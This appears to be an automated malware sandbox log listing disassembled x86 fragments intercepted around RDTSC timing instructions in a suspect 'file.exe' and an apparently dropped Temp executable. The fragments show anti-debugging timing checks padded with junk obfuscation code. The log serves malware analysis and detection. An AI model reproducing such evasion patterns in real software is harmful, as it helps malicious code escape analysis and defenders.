Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470526 second address: 547053E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jns 00007F40B515FC64h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dx, F96Ch 0x00000014 mov ax, dx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547053E second address: 54705F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F40B477E78Ch 0x00000009 sbb esi, 7D586F88h 0x0000000f jmp 00007F40B477E78Bh 0x00000014 popfd 0x00000015 mov di, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b add eax, ecx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F40B477E797h 0x00000024 and ax, 7C7Eh 0x00000029 jmp 00007F40B477E799h 0x0000002e popfd 0x0000002f popad 0x00000030 mov ecx, dword ptr [ebp+08h] 0x00000033 pushad 0x00000034 push esi 0x00000035 pushfd 0x00000036 jmp 00007F40B477E793h 0x0000003b sbb ah, FFFFFF8Eh 0x0000003e jmp 00007F40B477E799h 0x00000043 popfd 0x00000044 pop ecx 0x00000045 mov dx, 6B84h 0x00000049 popad 0x0000004a test ecx, ecx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F40B477E796h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54705F7 second address: 54705FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54705FD second address: 5470601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546019A second address: 54601A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54601A0 second address: 546021D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E793h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F40B477E796h 0x00000011 push eax 0x00000012 pushad 0x00000013 call 00007F40B477E791h 0x00000018 mov bx, cx 0x0000001b pop esi 0x0000001c pushfd 0x0000001d jmp 00007F40B477E78Dh 0x00000022 xor si, 85C6h 0x00000027 jmp 00007F40B477E791h 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F40B477E78Dh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546021D second address: 5460223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460223 second address: 5460227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460227 second address: 5460295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushad 0x0000000c call 00007F40B515FBFBh 0x00000011 pop ecx 0x00000012 mov cx, bx 0x00000015 popad 0x00000016 call 00007F40B515FC05h 0x0000001b pushfd 0x0000001c jmp 00007F40B515FC00h 0x00000021 and esi, 5C4FB328h 0x00000027 jmp 00007F40B515FBFBh 0x0000002c popfd 0x0000002d pop ecx 0x0000002e popad 0x0000002f sub esp, 2Ch 0x00000032 jmp 00007F40B515FBFFh 0x00000037 xchg eax, ebx 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460295 second address: 5460299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460361 second address: 5460365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460365 second address: 5460369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460369 second address: 546036F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546036F second address: 5460383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B477E790h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460383 second address: 54603AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub edi, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F40B515FC02h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54604CC second address: 54604D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54604D2 second address: 54604D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54604D6 second address: 54604F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F40B477E795h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54604F6 second address: 54604FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54604FC second address: 5460500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460545 second address: 5460549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460549 second address: 546054F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546054F second address: 5460555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460555 second address: 5460559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460559 second address: 546055D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546055D second address: 5460618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F4124F3C6ADh 0x0000000e jmp 00007F40B477E78Ah 0x00000013 js 00007F40B477E7F4h 0x00000019 pushad 0x0000001a mov di, si 0x0000001d mov di, ax 0x00000020 popad 0x00000021 cmp dword ptr [ebp-14h], edi 0x00000024 pushad 0x00000025 call 00007F40B477E792h 0x0000002a mov esi, 0EB59D31h 0x0000002f pop ecx 0x00000030 pushfd 0x00000031 jmp 00007F40B477E797h 0x00000036 sbb cl, FFFFFF9Eh 0x00000039 jmp 00007F40B477E799h 0x0000003e popfd 0x0000003f popad 0x00000040 jne 00007F4124F3C64Ch 0x00000046 jmp 00007F40B477E78Eh 0x0000004b mov ebx, dword ptr [ebp+08h] 0x0000004e jmp 00007F40B477E790h 0x00000053 lea eax, dword ptr [ebp-2Ch] 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F40B477E797h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460618 second address: 5460645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F40B515FBFDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460645 second address: 546064B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546064B second address: 546064F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546064F second address: 5460653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460653 second address: 5460661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460661 second address: 546068F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F40B477E791h 0x0000000a or ax, 45A6h 0x0000000f jmp 00007F40B477E791h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546068F second address: 5460695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460695 second address: 5460723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E793h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d movzx esi, bx 0x00000010 pushfd 0x00000011 jmp 00007F40B477E791h 0x00000016 and al, 00000066h 0x00000019 jmp 00007F40B477E791h 0x0000001e popfd 0x0000001f popad 0x00000020 nop 0x00000021 jmp 00007F40B477E78Eh 0x00000026 push eax 0x00000027 jmp 00007F40B477E78Bh 0x0000002c nop 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F40B477E794h 0x00000034 xor eax, 7190AA68h 0x0000003a jmp 00007F40B477E78Bh 0x0000003f popfd 0x00000040 push eax 0x00000041 push edx 0x00000042 mov bl, ch 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460723 second address: 5460742 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 mov bx, C6BAh 0x0000000d popad 0x0000000e mov dword ptr [esp], ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F40B515FBFCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450EE0 second address: 5450EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450EE6 second address: 5450F0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F40B515FC00h 0x00000009 xor eax, 697C23A8h 0x0000000f jmp 00007F40B515FBFBh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450F0E second address: 5450F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [ebp-04h], 55534552h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F40B477E790h 0x00000017 sbb si, 9608h 0x0000001c jmp 00007F40B477E78Bh 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450F8C second address: 5450FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B515FC04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450FA4 second address: 5460B8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a and bl, 00000001h 0x0000000d movzx eax, bl 0x00000010 lea esp, dword ptr [ebp-0Ch] 0x00000013 pop esi 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 pop ebp 0x00000017 ret 0x00000018 add esp, 04h 0x0000001b jmp dword ptr [003CA41Ch+ebx*4] 0x00000022 push edi 0x00000023 call 00007F40B47A4187h 0x00000028 push ebp 0x00000029 push ebx 0x0000002a push edi 0x0000002b push esi 0x0000002c sub esp, 000001D0h 0x00000032 mov dword ptr [esp+000001B4h], 003CCB10h 0x0000003d mov dword ptr [esp+000001B0h], 000000D0h 0x00000048 mov dword ptr [esp], 00000000h 0x0000004f mov eax, dword ptr [003C81DCh] 0x00000054 call eax 0x00000056 mov edi, edi 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460B8A second address: 5460B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460B8E second address: 5460BA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E792h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460BA4 second address: 5460BDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F40B515FC06h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F40B515FBFEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460BDB second address: 5460C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 28CC28B4h 0x00000008 jmp 00007F40B477E78Dh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 movzx esi, bx 0x00000015 call 00007F40B477E799h 0x0000001a pushfd 0x0000001b jmp 00007F40B477E790h 0x00000020 adc esi, 6496C8C8h 0x00000026 jmp 00007F40B477E78Bh 0x0000002b popfd 0x0000002c pop eax 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F40B477E792h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460C4C second address: 5460C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460C52 second address: 5460C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460C56 second address: 5460C9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [75C7459Ch], 05h 0x0000000f jmp 00007F40B515FC09h 0x00000014 je 00007F412590D977h 0x0000001a pushad 0x0000001b movzx esi, di 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F40B515FC01h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460C9D second address: 5460CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460CA3 second address: 5460CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460CA7 second address: 5460CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460E07 second address: 5460E0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548068C second address: 5480690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480690 second address: 5480696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480696 second address: 54806EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 3121h 0x00000007 pushfd 0x00000008 jmp 00007F40B477E78Eh 0x0000000d xor eax, 227FAEB8h 0x00000013 jmp 00007F40B477E78Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d jmp 00007F40B477E799h 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 call 00007F40B477E78Ah 0x0000002b pop ecx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54806EA second address: 5480781 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 479D8C06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dx, 6292h 0x0000000d popad 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov bl, B1h 0x00000013 pushfd 0x00000014 jmp 00007F40B515FC00h 0x00000019 adc al, FFFFFFA8h 0x0000001c jmp 00007F40B515FBFBh 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, esi 0x00000024 pushad 0x00000025 pushad 0x00000026 mov ax, C531h 0x0000002a pushfd 0x0000002b jmp 00007F40B515FBFEh 0x00000030 sub esi, 2D1FFD08h 0x00000036 jmp 00007F40B515FBFBh 0x0000003b popfd 0x0000003c popad 0x0000003d jmp 00007F40B515FC08h 0x00000042 popad 0x00000043 push eax 0x00000044 jmp 00007F40B515FBFBh 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F40B515FC00h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480781 second address: 5480785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480785 second address: 548078B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548078B second address: 54807DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f pushfd 0x00000010 jmp 00007F40B477E78Ah 0x00000015 or ecx, 6915F428h 0x0000001b jmp 00007F40B477E78Bh 0x00000020 popfd 0x00000021 popad 0x00000022 test esi, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F40B477E795h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54807DA second address: 5480812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F41258ED7BEh 0x0000000f jmp 00007F40B515FBFEh 0x00000014 cmp dword ptr [75C7459Ch], 05h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ah, dl 0x00000020 push esi 0x00000021 pop edi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480812 second address: 548086F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4124F243FCh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F40B477E794h 0x00000016 add si, E678h 0x0000001b jmp 00007F40B477E78Bh 0x00000020 popfd 0x00000021 mov ah, C9h 0x00000023 popad 0x00000024 push edx 0x00000025 pushad 0x00000026 mov eax, 0CFAA7FDh 0x0000002b push eax 0x0000002c movsx ebx, si 0x0000002f pop ecx 0x00000030 popad 0x00000031 mov dword ptr [esp], esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F40B477E78Ch 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548086F second address: 5480881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B515FBFEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54808BB second address: 54808BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54808BF second address: 54808C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54808C5 second address: 54808E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B477E798h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54808E1 second address: 54808F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F40B515FBFAh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126E7B second address: 1126EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E78Ch 0x00000009 jmp 00007F40B477E798h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126EA5 second address: 1126EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126EAA second address: 1126EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126EB0 second address: 1126EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126EB6 second address: 1126EE0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F40B477E786h 0x00000008 jnc 00007F40B477E786h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F40B477E78Ch 0x0000001a jp 00007F40B477E786h 0x00000020 push eax 0x00000021 push edx 0x00000022 jbe 00007F40B477E786h 0x00000028 push edx 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126EE0 second address: 1126EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126EE6 second address: 1126F01 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F40B477E78Dh 0x0000000d jno 00007F40B477E786h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1126F01 second address: 1126F0B instructions: 0x00000000 rdtsc 0x00000002 js 00007F40B515FBF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1120E68 second address: 1120E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E799h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F40B477E786h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1120E90 second address: 1120E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1120E94 second address: 1120EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 jo 00007F40B477E786h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1120EAB second address: 1120EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B515FC05h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	RDTSC instruction interceptor: First address: 1120EC8 second address: 1120EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F40B477E786h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
